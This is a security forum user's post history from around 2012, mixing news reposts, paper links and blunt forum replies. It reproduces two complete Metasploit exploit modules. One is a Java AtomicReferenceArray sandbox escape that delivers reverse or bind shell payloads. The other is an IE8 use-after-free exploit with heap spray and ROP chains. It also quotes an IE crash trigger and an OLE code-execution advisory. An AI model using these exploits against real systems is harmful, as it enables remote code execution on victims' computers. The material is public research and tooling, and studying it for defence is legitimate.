Nytro

Everything posted by Nytro

  1. Java AtomicReferenceArray Type Violation Vulnerability

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java AtomicReferenceArray Type Violation Vulnerability',
      'Description'   => %q{
          This module exploits a vulnerability due to the fact that
        AtomicReferenceArray uses the Unsafe class to store a reference in
        an array directly, which may violate type safety if not used properly.
        This allows a way to escape the JRE sandbox, and load additional
        classes in order to perform malicious operations.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'sinn3r',        # metasploit module
          'juan vazquez',  # metasploit module
          'egypt'          # special assistance
        ],
      'References'    =>
        [
          ['CVE', '2012-0507'],
          ['BID', '52161'],
          ['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
          ['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch'     => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86,
            }
          ],
          [ 'Mac OS X PPC (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_PPC,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 14 2012'
    ))
  end

  def exploit
    # load the static jar file
    path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0507.jar" )
    fd = File.open( path, "rb" )
    @jar_data = fd.read(fd.stat.size)
    fd.close

    super
  end

  def on_request_uri( cli, request )
    data = ""
    host = ""
    port = ""
    peer = "#{cli.peerhost}:#{cli.peerport}"

    if not request.uri.match(/\.jar$/i)
      if not request.uri.match(/\/$/)
        send_redirect( cli, get_resource() + '/', '')
        return
      end

      print_status("#{peer} - Sending #{self.name}")

      payload = regenerate_payload( cli )
      if not payload
        print_error("#{peer} - Failed to generate the payload." )
        return
      end

      if target.name == 'Generic (Java Payload)'
        if datastore['LHOST']
          jar  = payload.encoded
          host = datastore['LHOST']
          port = datastore['LPORT']
          vprint_status("Java reverse shell to #{host}:#{port} from #{peer}" )
        else
          port = datastore['LPORT']
          datastore['RHOST'] = cli.peerhost
          vprint_status( "Java bind shell on #{cli.peerhost}:#{port}..." )
        end
        if jar
          print_status( "Generated jar to drop (#{jar.length} bytes)." )
          jar = Rex::Text.to_hex( jar, prefix="" )
        else
          print_error("#{peer} - Failed to generate the executable." )
          return
        end
      else
        # NOTE: The EXE mixin automagically handles detection of arch/platform
        data = generate_payload_exe

        if data
          print_status("#{peer} - Generated executable to drop (#{data.length} bytes)." )
          data = Rex::Text.to_hex( data, prefix="" )
        else
          print_error("#{peer} - Failed to generate the executable." )
          return
        end
      end

      send_response_html( cli, generate_html( data, jar, host, port ), { 'Content-Type' => 'text/html' } )
      return
    end

    print_status( "#{peer} - sending jar..." )
    send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )

    handler( cli )
  end

  def generate_html( data, jar, host, port )
    jar_name = rand_text_alpha(rand(6)+3) + ".jar"

    html  = "<html><head></head>"
    html += "<body>"
    html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
    html += "<param name=\"data\" value=\"#{data}\"/>" if data
    html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
    html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
    html += "<param name=\"lport\" value=\"#{port}\"/>" if port
    html += "</applet></body></html>"
    return html
  end

  def generate_jar()
    return @jar_data
  end

end
```

    Source: Java AtomicReferenceArray Type Violation Vulnerability
  2. There are programs that, based on signatures, show you what the possibilities could be. Java? That's something else; does it happen to have the .jar or .class extension? If it's .exe or .dll, see: PEiD. See also PE Explorer and many other useful programs...
  3. Take a ban, quick and easy.
  4. (thread: Query Havij)

    That thing only applies if you connect to MySQL using JDBC; it lets you use multiple queries, but MySQL doesn't stop you from executing multiple queries. It's about the JDBC driver, not about MySQL. See also: http://se2.php.net/manual/en/mysqli.multi-query.php
  5. (thread: Query Havij)

    Yeah..

```
mysql> select table_name from tables limit 1; select column_name from columns limit 1;
+----------------+
| table_name     |
+----------------+
| CHARACTER_SETS |
+----------------+
1 row in set (0.00 sec)

+--------------------+
| column_name        |
+--------------------+
| CHARACTER_SET_NAME |
+--------------------+
1 row in set (0.07 sec)

mysql>
```

    And, from the PHP manual (mysql_query):

    resource mysql_query ( string $query [, resource $link_identifier = NULL ] )

    mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier.
  6. The browser makes a request to the ISP's DNS server. Short version. If the domain isn't found, the lookup goes further up the hierarchy until it reaches a root server. The browser has nothing to do with the root server, it doesn't know "who" it is; the requests are forwarded between DNS servers.
  7. (thread: Query Havij)

    Maybe if you too read about SQL (Structured Query Language) and about an RDBMS (Relational Database Management System) you wouldn't ask thoughtless questions anymore.
  8. 1) The (global) root DNS servers are public, so they got nothing.
    2) I don't see the connection to "hacking".
    3) The servers aren't Vasile's; most likely all packets that don't come from DNS sub-servers get DROPped, and they probably have a hardware firewall too.
    4) When you visit RST, DNS resolution isn't done on a global DNS server, so users won't have any problem.
    5) It takes a while for new domains to propagate, but existing ones are on other DNS servers belonging to the ISPs, so there won't be any problems.
    As I thought, kids: in the worst case they slow down the propagation of new domains (registered at that moment), but it's clear they don't have the brains.
  9. Man, do you think about what you're saying? How the hell do you make 250k dollars with a vulnerability? Maybe if you somehow have an RCE in sshd so you can get access to every SSH server in the world, or in Apache so you can execute code on 50% of the web servers in the world... And look, I see nothing about XSS and SQLi... But oh, don't governments pay 100k for an SQLi? Don't they consider an SQLi "hacking"? Do they even send you to prison for one?
  10. It's from 3 years ago, I don't think it's "useful" anymore, ALTHOUGH the loader is an ActiveX which I don't think is very detected.
  11. He's right, at least from the perspective he's speaking from, but the same principles apply everywhere. Let's take SQL Injection as an example. Vasile comes along and finds an SQL Injection in a site. Fine, does that mean he's "qualified" for a pentester position, or does finding some lousy SQL Injection in a site make him a pentester? NO. To be a good pentester you first of all need to know MYSQL. Yes, you need to know the SQL language. And that would only be a KNOWLEDGE BASE. It's not nearly enough. You need to know SQL Server, know Oracle, know SQLite too, and not only as database management systems but also as attack vectors, and a lot of administration. You also need to know ASP.NET and Ruby, not just PHP, because not all sites are written in PHP. And this is important, because two-bit companies won't pay for pentesting; big companies will pay, and they DON'T USE MySQL and PHP, they use other technologies: Oracle, ASP.NET... How many of you (who claim to know PHP and MySQL, but I don't think you've written more than 1000 lines of code in these languages) know ASP.NET or other technologies? How many lines of code have you written to be able to claim you can find and FIX vulnerable code? Do you think that knowing how to use a UNION for MySQL, or to put in a ../../etc/passwd, is enough, done, you write PENTESTER on your forehead? If you think that, it's clear, you're severely limited. And the two-bit tutorials you read are to blame. Actually, not the tutorials, but the fact that they're short, and that's the only thing that convinces you to read them, but it also limits you, because having learned one thing, you don't realize there are another 1000 that should be known, and you consider yourselves gods...
  12. Deep Dive into OS Internals with Windbg

    Malware and OS Internals: an approach towards reversing malware, shellcode and other malicious code to understand the ways in which they use the OS internals for their functionality.

    Contents:
    - Preface
    - Reversing Windows Internals
    - Portable Executable Anatomy
    - Data Directories of Interest
    - Import Directory
    - Import Address Table
    - Export Directory
    - Manual Walkthrough of Export Directory
    - Process Environment Block
    - Different methods to locate the PEB
    - Understanding an Example Shellcode
    - Using _PEB_LDR_DATA
    - Using _LDR_DATA_TABLE_ENTRY
    - Practical Example with Rustock.B Rootkit
    - Conclusion
    - References

    Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18576.pdf
  13. Pwn2Own Challenges: Heapsprays are for the 99%

    BY PETER VREUGDENHIL, THU 15 MAR 2012

    In case you aren't familiar with the Pwn2Own rules this year, we asked people to exploit public bugs... here's one of them. The CVE in question (CVE-2010-0248) is a use-after-free vulnerability in Internet Explorer 8 found by yours truly back in 2010. This specific bug is triggered by the following PoC:

```html
<html>
<head>
<script>
function Start() {
  var TableClone = document.getElementById('tableid').cloneNode(1);
  var TableCellUrns = TableClone.cells.urns('a');
  //var bla = TableClone.cells.item(1);
  var TableCellUrnsTags = TableCellUrns.tags('a');
  TableClone.outerText = 'a';
  Result = TableClone.cells;
  Result = TableCellUrnsTags.item(-1);
}
</script>
</head>
<body onLoad="window.setTimeout(Start,100);" id="bodyid">
<table id="tableid">
<tr><th id="thid"></th></tr>
<tr id="trid"><td id="tdid"></td></tr>
</table>
</body>
</html>
```

    Download here

    This is also the trigger that we handed out to the contestants at Pwn2Own for the CVE challenges. So if you want to try it out yourself you should probably stop reading right now and just start playing around with it.

    Full article: http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup
  14. MS10-002 Internet Explorer Object Memory Use-After-Free

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS10-002 Internet Explorer Object Memory Use-After-Free",
      'Description'    => %q{
          This module exploits a vulnerability found in Internet Explorer's mshtml component.
        Due to the way IE handles objects in memory, it is possible to cause a pointer in
        CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed,
        therefore allowing remote code execution under the context of the user.
        This particular vulnerability was also one of 2012's Pwn2Own challenges, and was
        later explained by Peter Vreugdenhil with exploitation details. Instead of
        Peter's method, this module uses heap spraying like the 99% to store a specially
        crafted memory layout before re-using the freed memory.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Peter Vreugdenhil',  # Vulnerability discovery and exploit writeup
          'juan vazquez',       # Metasploit
          'sinn3r'              # Metasploit
        ],
      'References'     =>
        [
          [ 'MSB', 'MS10-002' ],
          [ 'CVE', '2010-0248' ],
          [ 'OSVDB', '61914' ],
          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-014/' ]
        ],
      'Payload'        =>
        {
          'Space'       => 1000,
          'BadChars'    => "\x00",
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3',
            {
              'Rop'    => :msvcrt,
              'Offset' => '0x5f4',
              'Ret'    => 0x77c15ed5
            },
          ],
          [ 'IE 8 on Windows 7 SP0',
            {
              'Rop'    => :jre,
              'Offset' => '0x5f4',
              'Ret'    => 0x7c348b05
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 21 2010",
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    # If the target is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
      return targets[1]  # IE 8 on Windows XP SP3
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
      return targets[2]  # IE 8 on Windows 7 SP1 with JRE
    else
      return nil
    end
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    js_code = build_javascript(my_target)

    html = %Q|
    <html>
    <head>
    <script>
    #{js_code}
    </script>
    </head>
    <body onLoad="window.setTimeout(Start,100);" id="bodyid">
    <table id="tableid">
    <tr><th id="thid"></th></tr>
    <tr id="trid"><td id="tdid"></td></tr>
    </table>
    </body>
    </html>
    |

    print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def build_javascript(my_target)
    p = get_payload(my_target)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

    # The exploit will try to take up the freed memory
    # with a fake item before the reuse
    fake_item = [
      junk, junk, junk, junk, junk, junk, junk, junk,
      junk, junk, junk, junk, junk, junk, junk, junk,
      junk,
      0x0c0c003c, # pointer to c_table_cell
      junk, junk, junk,
      0x0c0c0050, # pointer to c_cache_item
      junk, junk,
    ].pack("V*")
    fake_item_js = Rex::Text.to_unescape(fake_item)

    # Here starts the crafted layout of the memory
    # which will be sprayed to get code execution
    # IE 8 => Spray will be sprayed into 0c0c0024
    memory_layout = [
      junk, junk, junk, junk, junk, junk,
      0x0c0c0040, # ----- points to 0x0c0c0040
      0x0c0c0c0c, # <---| 0x0c0c0c0c + 0x70: 0x0c0c0c7c will store the stackpivot with eax pointing to 0c0c0c0c
      junk, junk,
      0x00000000, # Allows to bypass CTableCell::GetAAcolSpan
      junk,       # Stored at 0c0c0c50
      junk, junk,
      0x0c0c0078,
      junk, junk, junk, junk, junk,
      0x0c0c0c50, # <- Stored at 0c0c0074 (0x0c0c0078 - 4)
      0x00000001  # Stored at 0c0c0078 (0c0c0050+28) # Allows to exit of CTableRowCellsCollectionCacheItem::GetNext faster
    ].pack("V*")
    memory_layout_js = Rex::Text.to_unescape(memory_layout)

    # Steps:
    # 1. Force the free.
    # 2. Try to reuse the freed memory with a fake item.
    #    The fake item stores crafted pointers to the
    #    memory which will be sprayed on step 3.
    # 3. Heap Spray: Shellcode + crafted memory layout to
    #    get execution flow when the memory freed in step 1
    #    is reused in step 4.
    # 4. Force the memory reuse.
    spray = <<-JS
    function Start() {
      var fake_items = unescape("#{fake_item_js}");
      while (fake_items.length < 0x1000) fake_items += fake_items;
      var fake_item = fake_items.substring(0, (96-6)/2);

      var code = unescape("#{js_code}");
      var memory_layout = unescape("#{memory_layout_js}");
      var nops = unescape("#{js_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{my_target['Offset']} - memory_layout.length);
      var shellcode = memory_layout + offset + code + nops.substring(0, 0x800-#{my_target['Offset']}-code.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block_shell = shellcode.substring(0, (0x80000-6)/2);

      var heap = new heapLib.ie(0x20000);

      var TableClone = document.getElementById('tableid').cloneNode(1);
      var TableCellUrns = TableClone.cells.urns('a');
      var bla = TableClone.cells.item(1);
      var TableCellUrnsTags = TableCellUrns.tags('a');
      TableClone.outerText = 'a';
      heap.gc();

      for (i = 0; i < 30; i++) {
        heap.alloc(fake_item);
      }

      for (var i = 1; i < 0x1C2; i++) {
        heap.alloc(block_shell);
      }

      Result = TableClone.cells;
      Result = TableCellUrnsTags.item(1);
    }
    JS

    spray = heaplib(spray, {:noobfu => true})

    return spray
  end

  def nop
    return make_nops(4).unpack("V").first
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  # ROP chain + shellcode will be sprayed at 0x0c0c0c0c
  def get_payload(t)
    # chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      rop = [
        0x77c4e392, # POP EAX # RETN
        0x77c11120, # <- *&VirtualProtect()
        0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
        junk,
        0x77c2dd6c,
        0x77c4ec00, # POP EBP # RETN
        0x77c35459, # ptr to 'push esp # ret'
        0x77c47705, # POP EBX # RETN
        0x00000800, # <- change size to mark as executable if needed (-> ebx)
        0x77c3ea01, # POP ECX # RETN
        0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
        0x77c46100, # POP EDI # RETN
        0x77c46101, # ROP NOP (-> edi)
        0x77c4d680, # POP EDX # RETN
        0x00000040, # newProtect (0x40) (-> edx)
        0x77c4e392, # POP EAX # RETN
        nop,        # NOPS (-> eax)
        0x77c12df9, # PUSHAD # RETN
      ].pack("V*")
    when :jre
      rop = [
        0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
        0x7c347f98, # RETN (ROP NOP)
        0x7c3415a2, # JMP [EAX]
        0xffffffff,
        0x7c376402, # skip 4 bytes
        0x7c351e05, # NEG EAX # RETN
        0x7c345255, # INC EBX # FPATAN # RETN
        0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
        0x7c344f87, # POP EDX # RETN
        0xffffffc0, # Value to negate, will become 0x00000040
        0x7c351eb1, # NEG EDX # RETN
        0x7c34d201, # POP ECX # RETN
        0x7c38b001, # &Writable location
        0x7c347f97, # POP EAX # RETN
        0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
        0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
        0x7c345c30, # ptr to 'push esp # ret '
      ].pack("V*")
    end

    code = rop
    code << make_nops(38)
    code << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+0x6").encode_string  # instr length: 2 bytes
    code << [t.ret].pack("V")  # Stack Pivot
    code << payload.encoded

    return code
  end

end

=begin
(694.cc0): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000100 ecx=0241f518 edx=7c90e4f4 esi=7c90d6d0 edi=ffffffff
eip=7c8022cf esp=0241f534 ebp=0241f548 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
kernel32!WriteProcessMemory+0x6d:
7c8022cf cc              int     3
=end
```

    Source: MS10-002 Internet Explorer Object Memory Use-After-Free
  15. Yes redox, you're right, I see people everywhere who want salaries of 1500-2000 euros a month. The vast majority are computer science students. The same applies to the losers on RST. What the hell do you know how to do for that kind of money? What would someone have to do for you to give them 2000 euros a month? Let's be serious, even if you had the money, you wouldn't give that much even to the slickest whore, but when it comes to receiving, you all want a pile of money and you want it for nothing. Let me take my classic example: the students at my faculty, computer science. What do they know how to do? Nothing worth a damn. They don't EVEN know what's taught at the faculty; even though they're nerds and get high grades, if after 2 months you ask them how to overload the cast operator in C++ you'll want to slap them. These guys don't even know what HTTP is, don't know what TCP means, don't know what a DLL is and don't know what grep does, but when it comes to salaries... "Daddy, I want to be a programmer and have 1000 euros as my first salary, because I'm so damn smart." It's the same here. You all think you're smart because you find an XSS/SQLi. You want to become "pentesters" thinking you're bursting with brains. And above all you want a minimum of 2000 euros for it. Or you want to become programmers, and even though you HAVEN'T WRITTEN 200 LINES OF CODE in your life, someone should offer you thousands of euros, so you have billiards, whisky and whores at work and do no work at all... Wake up to reality...
  16. (thread: Decompiler c++)

    What you want to do is called, less technically, "hexing", i.e. you want to take someone else's work and just change the text strings. I don't know what crap the junk you use for scanning contains, but they're probably compiled C programs. A decompiler won't help you much, especially since from the way you express yourself I realize those aren't exactly details that interest you.

    To actually understand:
    - learn a bit of C on Linux
    - read about the structure of Linux executables (search for "ELF File Format")
    - see what a debugger does

    To understand nothing and just change a text, which is what you'll do 99%:
    - find a Hex Editor (regardless of whether it's for Linux or Windows)
    - open that executable file
    - change those texts, BUT make sure the length of the text you enter is EXACTLY the length of the previous text so as not to break the structure of the executable. You can try putting a \0 if you have a shorter text, or you can risk going a bit over, but then don't be surprised if the program crashes
    - then send the program to everyone and brag about someone else's work (anyway, the person before you probably did the same), claiming you made it
  17. Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation

    Tarjei Mandt, Norman Threat Research, tarjei.mandt @ norman.com

    Abstract. One of the most prevalent bug classes affecting Windows kernel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the dereferenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory manager and does not introduce any offending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal.

    Keywords: null pointer vulnerabilities, exploitation, mitigation

    Download: http://www.mista.nu/research/nullpage.pdf
  18. Yeah, neat.
  19. Go to Real/Carrefour/Cora, to the drinks aisle...
  20. After a while...

    - Cyber Criminals Selling Millions of U.S military email addresses
    - Yet Another Google Chrome Sandbox Critical Exploit by Turkish security experts
    - Kaspersky finds Malware that resides in your RAM
    - The Linux Tips
    - Exploit For Ms12-020 RDP Bug Moves to Metasploit
    - MS12-002 Microsoft Remote Desktop Use-After-Free DoS
    - MS12-020 Vulnerability for Breakfast
    - Symantec Identifies New Duqu Trojan Driver Variant
    - Address spoofing vulnerability in iOS's Safari
    - Advanced Firewall Configurations with ipset
    - Java Applet Same-Origin Policy Bypass via HTTP Redirect
    - Source Code Spoofing with HTML5 and the LTO Character
    - Debian's x11-common init script weakness (CVE-2012-1093)
    - Portable Executable File Format – A Reverse Engineer View
    - Adobe Photoshop 12.1 Tiff Parsing Use-After-Free
    - Compiling Nmap for Android
    - BackTrack tool review: goofile
    - VIDEO: How to solve the RSA 2012
    - Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit
    - Debugger Inception – The Scriptable Debugger Within The Debugger
    - An interesting case of JRE sandbox breach (CVE-2012-0507)
    - Insecure magazine - RSA Conference
    - Reverse Engineering Firmware: Linksys WAG120N
    - Microsoft OLE for Windows code execution
    - România și criminalitatea informatică, tendințe (Romania and cybercrime, trends)
    - What's New in Linux 3.3?

    Updated: https://www.facebook.com/rstforum
  21. What's New in Linux 3.3?

    Tuesday, 20 March 2012 10:54, Joe 'Zonker' Brockmeier

    Sunday, Linus Torvalds released the 3.3 Linux kernel. In the latest installment of the continuing saga of kernel development, we've got more progress towards Android in the kernel, EFI boot support, Open vSwitch, and improvements that should help with the problem of Bufferbloat.

    Is it just me, or is it still a little weird to be talking about 3.x kernels? It's been about eight months since the official bump to 3.0, but that's compared to more than seven years with the 2.6.x series. At any rate, here we are. Let's take a look at some of the changes in Linux 3.3!

    Everybody was Bufferbloat Fighting!

    The Android patches are likely to get the most attention in 3.3, but the thing that I'm most excited by? More work going on to solve the Bufferbloat problem. In a nutshell, Bufferbloat is a symptom of a lot of small problems that creates "a huge drag on Internet performance, ironically, by previous attempts to make it work better." Or the one-sentence summary: "bloated buffers lead to network-crippling latency spikes." It's not a problem that's going to be solved all in one go, or in one area. But the Linux kernel is one of the pieces that needs addressing. In the 3.3 release, we've got the ability to set byte queue limits in the kernel.

    Driver Goodies

    Check out the list of drivers that have made it out of staging. Specifically, the gma500 driver is out of staging. This means the infamous Poulsbo chipset should be supported in the mainline kernel finally.

    This release also includes the NVM Express driver (NVMe) which supports solid state disks attached to the PCI-Express bus. Most SSDs are SATA, Fibre Channel or SAS drives. The work was done by Intel's Matthew Wilcox, which isn't surprising since the NVM Express standard is also supported by Intel and a number of other companies. Would love to get my hands on one of these drives to test the 3.3 kernel out...

    Want to tether your Linux box to your brand new iPhone? The iPhone USB Ethernet Driver (ipeth) module has been updated to add support for the iPhone 4S. The 3.3 kernel also picks up some drivers for third generation Wacom Bamboo tablets and Cintiq 24HD, and initial driver support for the Intuos4.

    Open vSwitch

    Another biggie in 3.3? The Open vSwitch project is merging into the kernel tree. It's not new – it's been around for some time – but it's finally making its way into the mainline kernel. (This seems to be a frequent theme, doesn't it?) Basically, Open vSwitch is a virtual switch for complex virtualized server deployments. Given the ever-growing popularity of virtualized servers and cloud deployments, this is something in high demand.

    As the Open vSwitch page says, "Open vSwitch can operate both as a soft switch running within the hypervisor, and as the control stack for switching silicon. It has been ported to multiple virtualization platforms and switching chipsets. It is the default switch in XenServer 6.0, the Xen Cloud Platform and also supports Xen, KVM, Proxmox VE and VirtualBox. It has also been integrated into many virtual management systems including OpenStack, openQRM, and OpenNebula." No doubt, you'll be reading more about Open vSwitch on Linux.com in the near future.

    Android Comes Closer

    Last, but not least, the 3.3 kernel includes nearly complete support for Android. This is good news all around, but isn't really a surprise. The kernel folks have been working on this for a long time. Now the question is, will we start seeing Android apps on top of normal distributions? Will we start seeing standard Linux apps running on Android? Will mod communities, like CyanogenMod, start using the mainline kernel? Should be an interesting year. Then again, when isn't it an interesting year when Linux is involved?

    As usual, the release includes lots more fixes, new drivers, and so forth. Check out the Kernel Newbies page for more.

    The merge window for 3.4 is now open, with the traditional two-week cutoff for pull requests. Looking forward to what 3.4 brings!

    Source: https://www.linux.com/news/featured-blogs/196:zonker/556270:whats-new-in-linux-33
  22. Romania and cybercrime, trends (România și criminalitatea informatică, tendințe)

    20 March 2012

    Today the first part of the conference "România, încotro? Criminalitatea informatică în secolul 21" (Romania, where to? Cybercrime in the 21st century), organized by Oxygen Events, took place at the National Bank. There are a few interesting conclusions that I'll comment on briefly below.

    The first is that cyber attacks are becoming more and more sophisticated, but that's nothing new. What is new is that the authorities aren't standing still. There is direct collaboration with IGPR, the cybercrime division. There is a BNR working forum that deals with cybercrime issues, and an inter-bank committee that handles the most important cases concerning banks, clients or institutions in the field.

    Armin Dinar, risk manager at PricewaterhouseCoopers, presented a detailed study on cyber threats and the main fears of affected companies and institutions. Losing money was not in first place; losing prestige or image in the industry was.

    Ioana Vasiu, who moderated the opening session, said that cybercrime currently reaches 388 billion dollars a year, close to the value of worldwide drug trafficking, which was calculated last year at 411 billion dollars. "It is clear where the crime industry is moving," she stressed.

    Andrei Petruș, product manager at Bitdefender: threats are moving at a rapid pace to mobile devices. Mobile operating systems are secure, but phenomena such as jailbreaking and unlocking of devices open the way to increasingly dangerous attacks. The growth in the number of attacks on mobile devices in 2011 was 4500%, he added.

    Via: SecuritateIT
    Source: România și criminalitatea informatică, tendințe - Securitate IT
  23. Microsoft OLE for Windows code execution

#######################################################################

Luigi Auriemma

Application:  Microsoft OLE for Windows
              http://www.microsoft.com
Versions:     ole32.dll < 5.1.2600.6168
Platforms:    Windows XP and 2003 before 13 Dec 2011
              NOT vulnerable: any other OS from Windows Vista on
Bug:          code execution
Exploitation: remote and via file
Date:         found 16 May 2011
              patched 13 Dec 2011
              adv/PoC 20 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

Additional references:
http://technet.microsoft.com/en-us/security/bulletin/ms11-093
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=966
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From the iDefense advisory:

"Many Windows applications that support the structured storage file
format (Office applications for example) contain support for reading
the SummaryInformation stream inside of the OLE document. This stream
contains various properties that describe the document (the author
for example). In addition to Office, Windows Explorer also supports
parsing these streams when a file is clicked and viewed via the
preview pane."

#######################################################################

======
2) Bug
======

First a couple of links about the OLE compound format:

http://poi.apache.org/hpsf/internals.html
http://msdn.microsoft.com/en-us/library/aa380072%28v=vs.85%29.aspx

Example of an HPSF header referred to the provided Visio
proof-of-concept:

  offset  bytes  description
  1200    2      0xfffe
  1202    2      0
  1204    4      operating system
  1208    16     clsid:0
  1218    4      1
  121c    16     clsid:F29F85E0-4FF9-1068-AB91-08002B27B3D9
  122c    4      offset from the 0xfffe header
  1230    4      section size
  1234    4      number of properties (0xb)
  1238    4      property type (for example 2 for title, 4 author and so on)
  123c    4      property offset (relative to 0x1230)
  ...
  1288    4      property type 0x11 (VT_CF) used for PID_THUMBNAIL
  128c    4      the original was located at offset 1358, now 13da

For exploiting the vulnerability it's necessary to use the VT property
VT_VERSIONED_STREAM (0x49), which is the cause of the type confusion
vulnerability leading to a trivial to exploit code execution.

From ole32!CoWaitForMultipleHandles:

  7756edcc 8b4708          mov     eax,dword ptr [edi+8]
  7756edcf 8b4010          mov     eax,dword ptr [eax+10h]
  7756edd2 8b08            mov     ecx,dword ptr [eax]
  7756edd4 50              push    eax
  7756edd5 ff5108          call    dword ptr [ecx+8]   ; code execution

The vulnerability has been tested with PPT, XLS and VSD files with the
same effects:

- remote exploitation via Internet Explorer, for example if there are
  Office Viewers installed
- automatic exploitation of explorer.exe if thumbnail previewing of the
  folder is enabled (if I'm not in error Windows XP has it activated by
  default), immediately upon opening the folder where the modified PPT
  file is located
- if the preview mode is not enabled it's necessary to view the
  properties of the file (right mouse button -> Properties)
- exploitation via opening the file may be possible only in some cases
  (Visio Viewer confirmed)

The proof-of-concept should be able to execute calc.exe via Internet
Explorer and Visio Viewer; the bug is so trivial to exploit that it's
even possible to not use a heap spray with some additional work.

#######################################################################

===========
3) The Code
===========

Proof-of-concept for Visio Viewer exploitable remotely via Internet
Explorer:

http://aluigi.org/poc/ole32_1.zip

#######################################################################

======
4) Fix
======

